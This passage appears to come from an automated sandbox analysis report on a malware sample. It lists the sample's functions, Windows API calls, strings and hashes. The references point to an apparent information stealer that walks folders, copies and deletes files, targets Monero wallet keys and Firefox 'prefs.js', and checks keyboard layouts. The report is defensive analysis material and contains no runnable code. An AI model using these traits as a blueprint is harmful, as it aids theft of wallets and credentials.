                  • Associated: 00000000.00000002.2223313164.000000000068E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.0000000000787000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000078F000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000079C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223528474.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223630158.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223643656.0000000000939000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Find$File$CloseFirstNextwsprintf
                  • String ID: %s\%s$%s\%s$%s\*
                  • API String ID: 180737720-445461498
                  • Opcode ID: 7c223b6c3bf7edfe4d7a2f21531cd968324a713cb079210d3a4fda06bb368fa7
                  • Instruction ID: 83886de7b4513e2ad20ba1d8e54d2e769a0ef643a0531bea47c72234d27094e9
                  • Opcode Fuzzy Hash: 7c223b6c3bf7edfe4d7a2f21531cd968324a713cb079210d3a4fda06bb368fa7
                  • Instruction Fuzzy Hash: AE6143B1910258ABCB20EFA0DC85FEA737CBB49700F04469CB64996141EE71EBA5CF95
                  Function 002B4570 Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 137stringmemoryfileCOMMON
                  Download Yara Rule
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 002B4580
                  • RtlAllocateHeap.NTDLL(00000000), ref: 002B4587
                  • wsprintfA.USER32 ref: 002B45A6
                  • FindFirstFileA.KERNEL32(?,?), ref: 002B45BD
                  • StrCmpCA.SHLWAPI(?,002C0FC4), ref: 002B45EB
                  • StrCmpCA.SHLWAPI(?,002C0FC8), ref: 002B4601
                  • FindNextFileA.KERNEL32(000000FF,?), ref: 002B468B
                  • FindClose.KERNEL32(000000FF), ref: 002B46A0
                  • lstrcat.KERNEL32(?,00D5FC40), ref: 002B46C5
                  • lstrcat.KERNEL32(?,00D5E088), ref: 002B46D8
                  • lstrlen.KERNEL32(?), ref: 002B46E5
                  • lstrlen.KERNEL32(?), ref: 002B46F6
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2223187392.00000000002A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                  • Associated: 00000000.00000002.2223169858.00000000002A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.0000000000351000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.000000000035D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.0000000000382000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.00000000004EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.00000000004FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000068E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.0000000000787000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000078F000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000079C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223528474.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223630158.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223643656.0000000000939000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                  • String ID: %s\%s$%s\*
                  • API String ID: 671575355-2848263008
                  • Opcode ID: 79fa52039a51022ef8fb110fd1f052e3a18f475c5a876c85e30460bc9aaac6cd
                  • Instruction ID: d369fbdb70789323f8147ca05fb8693c7aef297f937a4ac3ad0fdb6645ec42bb
                  • Opcode Fuzzy Hash: 79fa52039a51022ef8fb110fd1f052e3a18f475c5a876c85e30460bc9aaac6cd
                  • Instruction Fuzzy Hash: 4E5144B5910218ABCB24FB70DCC9FE9777CAB54300F404598B60996191EF74ABA4CF96
                  Function 002B3EA0 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 133fileCOMMON
                  Download Yara Rule
                  APIs
                  • wsprintfA.USER32 ref: 002B3EC3
                  • FindFirstFileA.KERNEL32(?,?), ref: 002B3EDA
                  • StrCmpCA.SHLWAPI(?,002C0FAC), ref: 002B3F08
                  • StrCmpCA.SHLWAPI(?,002C0FB0), ref: 002B3F1E
                  • FindNextFileA.KERNEL32(000000FF,?), ref: 002B406C
                  • FindClose.KERNEL32(000000FF), ref: 002B4081
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2223187392.00000000002A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                  • Associated: 00000000.00000002.2223169858.00000000002A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.0000000000351000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.000000000035D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.0000000000382000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.00000000004EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.00000000004FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000068E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.0000000000787000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000078F000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000079C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223528474.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223630158.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223643656.0000000000939000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Find$File$CloseFirstNextwsprintf
                  • String ID: %s\%s
                  • API String ID: 180737720-4073750446
                  • Opcode ID: 84d294198a45c3748f0229048a1c924d1c54ef572fdc8a6131a7cbb96396ac0d
                  • Instruction ID: a4924c888034aff27654548250ca9c041f8b543e4d6610c8ae6b9da846e58d6b
                  • Opcode Fuzzy Hash: 84d294198a45c3748f0229048a1c924d1c54ef572fdc8a6131a7cbb96396ac0d
                  • Instruction Fuzzy Hash: 9C5153B6910218ABCB24FBB0DC85EEA737CBB44300F40459CB65996041DF75EBA5CF95
                  Function 002AED20 Relevance: 17.9, APIs: 9, Strings: 1, Instructions: 369fileCOMMON
                  Download Yara Rule
                  APIs
                  • wsprintfA.USER32 ref: 002AED3E
                  • FindFirstFileA.KERNEL32(?,?), ref: 002AED55
                  • StrCmpCA.SHLWAPI(?,002C1538), ref: 002AEDAB
                  • StrCmpCA.SHLWAPI(?,002C153C), ref: 002AEDC1
                  • FindNextFileA.KERNEL32(000000FF,?), ref: 002AF2AE
                  • FindClose.KERNEL32(000000FF), ref: 002AF2C3
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2223187392.00000000002A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                  • Associated: 00000000.00000002.2223169858.00000000002A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.0000000000351000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.000000000035D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.0000000000382000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.00000000004EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.00000000004FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000068E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.0000000000787000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000078F000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000079C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223528474.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223630158.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223643656.0000000000939000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Find$File$CloseFirstNextwsprintf
                  • String ID: %s\*.*
                  • API String ID: 180737720-1013718255
                  • Opcode ID: b0378a1fd82377c2e766d17d1df635f750e7841b4861c5e7aef27443ac17eda1
                  • Instruction ID: 4bbc2ca69602fcf99e92f9325091e8247884e2846a97f9d46121e793a94217f9
                  • Opcode Fuzzy Hash: b0378a1fd82377c2e766d17d1df635f750e7841b4861c5e7aef27443ac17eda1
                  • Instruction Fuzzy Hash: 3FE1E671921118AAEB64FB60DC92EEE733CAF55340F4041E9B50B66452EF306FAACF51
                  Function 002AF6B0 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 275fileCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 002BA740: lstrcpy.KERNEL32(002C0E17,00000000), ref: 002BA788
                    • Part of subcall function 002BA920: lstrcpy.KERNEL32(00000000,?), ref: 002BA972
                    • Part of subcall function 002BA920: lstrcat.KERNEL32(00000000), ref: 002BA982
                    • Part of subcall function 002BA9B0: lstrlen.KERNEL32(?,00D58908,?,\Monero\wallet.keys,002C0E17), ref: 002BA9C5
                    • Part of subcall function 002BA9B0: lstrcpy.KERNEL32(00000000), ref: 002BAA04
                    • Part of subcall function 002BA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 002BAA12
                    • Part of subcall function 002BA8A0: lstrcpy.KERNEL32(?,002C0E17), ref: 002BA905
                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,002C15B8,002C0D96), ref: 002AF71E
                  • StrCmpCA.SHLWAPI(?,002C15BC), ref: 002AF76F
                  • StrCmpCA.SHLWAPI(?,002C15C0), ref: 002AF785
                  • FindNextFileA.KERNEL32(000000FF,?), ref: 002AFAB1
                  • FindClose.KERNEL32(000000FF), ref: 002AFAC3
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2223187392.00000000002A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                  • Associated: 00000000.00000002.2223169858.00000000002A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.0000000000351000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.000000000035D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.0000000000382000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.00000000004EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.00000000004FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000068E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.0000000000787000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000078F000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000079C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223528474.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223630158.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223643656.0000000000939000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                  • String ID: prefs.js
                  • API String ID: 3334442632-3783873740
                  • Opcode ID: 50e9fe4c18702be34ad9c2b2c8b79daa93675e9de4b0bb64c26b74a4535ac448
                  • Instruction ID: c52dcdfab57d60344285b3ef724365d08e3d9831c4078853e75e74456340c840
                  • Opcode Fuzzy Hash: 50e9fe4c18702be34ad9c2b2c8b79daa93675e9de4b0bb64c26b74a4535ac448
                  • Instruction Fuzzy Hash: F4B17A71920108ABDB24FF60DD96FED7379AF55340F4086A8E40A97141EF346B69CF92
                  Function 002A16D0 Relevance: 14.5, APIs: 7, Strings: 1, Instructions: 492fileCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 002BA740: lstrcpy.KERNEL32(002C0E17,00000000), ref: 002BA788
                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,002C510C,?,?,?,002C51B4,?,?,00000000,?,00000000), ref: 002A1923
                  • StrCmpCA.SHLWAPI(?,002C525C), ref: 002A1973
                  • StrCmpCA.SHLWAPI(?,002C5304), ref: 002A1989
                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 002A1D40
                  • DeleteFileA.KERNEL32(00000000), ref: 002A1DCA
                  • FindNextFileA.KERNEL32(000000FF,?), ref: 002A1E20
                  • FindClose.KERNEL32(000000FF), ref: 002A1E32
                    • Part of subcall function 002BA920: lstrcpy.KERNEL32(00000000,?), ref: 002BA972
                    • Part of subcall function 002BA920: lstrcat.KERNEL32(00000000), ref: 002BA982
                    • Part of subcall function 002BA9B0: lstrlen.KERNEL32(?,00D58908,?,\Monero\wallet.keys,002C0E17), ref: 002BA9C5
                    • Part of subcall function 002BA9B0: lstrcpy.KERNEL32(00000000), ref: 002BAA04
                    • Part of subcall function 002BA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 002BAA12
                    • Part of subcall function 002BA8A0: lstrcpy.KERNEL32(?,002C0E17), ref: 002BA905
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2223187392.00000000002A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                  • Associated: 00000000.00000002.2223169858.00000000002A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.0000000000351000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.000000000035D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.0000000000382000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.00000000004EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.00000000004FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000068E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.0000000000787000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000078F000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000079C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223528474.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223630158.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223643656.0000000000939000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                  • String ID: \*.*
                  • API String ID: 1415058207-1173974218
                  • Opcode ID: 980389f5d998049429dd0f6a17b1fe6f8e84c25a52aec50613f307a359d5df7c
                  • Instruction ID: 3d1beccd213c80ff12616944fafd4fcc877b49779d8089a228345bccf53f65b2
                  • Opcode Fuzzy Hash: 980389f5d998049429dd0f6a17b1fe6f8e84c25a52aec50613f307a359d5df7c
                  • Instruction Fuzzy Hash: B612F571930118BBDB25FB60CCA6EEE7378AF54340F404299B50A66491EF706FA9CF91
                  Function 002ADE10 Relevance: 14.4, APIs: 7, Strings: 1, Instructions: 370fileCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 002BA740: lstrcpy.KERNEL32(002C0E17,00000000), ref: 002BA788
                    • Part of subcall function 002BA9B0: lstrlen.KERNEL32(?,00D58908,?,\Monero\wallet.keys,002C0E17), ref: 002BA9C5
                    • Part of subcall function 002BA9B0: lstrcpy.KERNEL32(00000000), ref: 002BAA04
                    • Part of subcall function 002BA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 002BAA12
                    • Part of subcall function 002BA8A0: lstrcpy.KERNEL32(?,002C0E17), ref: 002BA905
                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,002C0C2E), ref: 002ADE5E
                  • StrCmpCA.SHLWAPI(?,002C14C8), ref: 002ADEAE
                  • StrCmpCA.SHLWAPI(?,002C14CC), ref: 002ADEC4
                  • FindNextFileA.KERNEL32(000000FF,?), ref: 002AE3E0
                  • FindClose.KERNEL32(000000FF), ref: 002AE3F2
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2223187392.00000000002A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                  • Associated: 00000000.00000002.2223169858.00000000002A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.0000000000351000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.000000000035D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.0000000000382000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.00000000004EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.00000000004FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000068E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.0000000000787000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000078F000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000079C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223528474.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223630158.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223643656.0000000000939000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                  • String ID: \*.*
                  • API String ID: 2325840235-1173974218
                  • Opcode ID: 9b2d83c18aa2ebd4b3cfbbf7c21a8f0e5ea808973fb713d2d22d11cf55d515a7
                  • Instruction ID: 9b99db297995ec6347f6c262d61ce6eec8f258f758af689759629860ebbe3974
                  • Opcode Fuzzy Hash: 9b2d83c18aa2ebd4b3cfbbf7c21a8f0e5ea808973fb713d2d22d11cf55d515a7
                  • Instruction Fuzzy Hash: 7DF18271834118AADB25FB60DCA6EEE7338BF55340F8042D9A41B66451EF306F6ACF61
                  Function 002ADA80 Relevance: 13.8, APIs: 9, Instructions: 255fileCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 002BA740: lstrcpy.KERNEL32(002C0E17,00000000), ref: 002BA788
                    • Part of subcall function 002BA920: lstrcpy.KERNEL32(00000000,?), ref: 002BA972
                    • Part of subcall function 002BA920: lstrcat.KERNEL32(00000000), ref: 002BA982
                    • Part of subcall function 002BA9B0: lstrlen.KERNEL32(?,00D58908,?,\Monero\wallet.keys,002C0E17), ref: 002BA9C5
                    • Part of subcall function 002BA9B0: lstrcpy.KERNEL32(00000000), ref: 002BAA04
                    • Part of subcall function 002BA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 002BAA12
                    • Part of subcall function 002BA8A0: lstrcpy.KERNEL32(?,002C0E17), ref: 002BA905
                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,002C14B0,002C0C2A), ref: 002ADAEB
                  • StrCmpCA.SHLWAPI(?,002C14B4), ref: 002ADB33
                  • StrCmpCA.SHLWAPI(?,002C14B8), ref: 002ADB49
                  • FindNextFileA.KERNEL32(000000FF,?), ref: 002ADDCC
                  • FindClose.KERNEL32(000000FF), ref: 002ADDDE
                  Memory Dump Source
                  • Source File: 00000000.00000002.2223187392.00000000002A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                  • Associated: 00000000.00000002.2223169858.00000000002A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.0000000000351000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.000000000035D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.0000000000382000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.00000000004EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.00000000004FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000068E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.0000000000787000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000078F000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000079C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223528474.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223630158.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223643656.0000000000939000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                  • String ID:
                  • API String ID: 3334442632-0
                  • Opcode ID: b4c08e636006787ff4e50a409f04753b53afdec738da59efe504affe5ecbee55
                  • Instruction ID: a62d862ed3ff053a74811fa61d5b34b82a1822a736b57f309eaf2cca5e78960e
                  • Opcode Fuzzy Hash: b4c08e636006787ff4e50a409f04753b53afdec738da59efe504affe5ecbee55
                  • Instruction Fuzzy Hash: EB913572920104A7CB14FFB0DC969ED737DAB85340F408668F91B96581EE34AB39CF92
                  Function 0067BEA2 Relevance: 11.6, Strings: 8, Instructions: 1625COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2223313164.00000000004FE000.00000040.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                  • Associated: 00000000.00000002.2223169858.00000000002A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.00000000002A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.0000000000351000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.000000000035D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.0000000000382000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.00000000004EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000068E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.0000000000787000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000078F000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000079C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223528474.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223630158.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223643656.0000000000939000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: ,A_z$<{N=$B"'$Vcw$X3{b$aXU$q=kU$wn{
                  • API String ID: 0-2917567846
                  • Opcode ID: ef5196566c40725f16de76132ffc063dfb81ab64a67983b1cd9f0ef65e286044
                  • Instruction ID: 16f1bc45ee9fd319a1507b331dbf50bdff5a008bdbe0b29991e267e59374b360
                  • Opcode Fuzzy Hash: ef5196566c40725f16de76132ffc063dfb81ab64a67983b1cd9f0ef65e286044
                  • Instruction Fuzzy Hash: 04B23AF390C2049FE304AE2DEC8567AFBE5EF94720F16493DEAC4C7744EA3558058696
                  Function 002B7B90 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 114memoryCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 002BA740: lstrcpy.KERNEL32(002C0E17,00000000), ref: 002BA788
                  • GetKeyboardLayoutList.USER32(00000000,00000000,002C05AF), ref: 002B7BE1
                  • LocalAlloc.KERNEL32(00000040,?), ref: 002B7BF9
                  • GetKeyboardLayoutList.USER32(?,00000000), ref: 002B7C0D
                  • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 002B7C62
                  • LocalFree.KERNEL32(00000000), ref: 002B7D22
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2223187392.00000000002A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                  • Associated: 00000000.00000002.2223169858.00000000002A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.0000000000351000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.000000000035D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.0000000000382000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.00000000004EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.00000000004FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000068E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.0000000000787000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000078F000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000079C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223528474.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223630158.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223643656.0000000000939000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
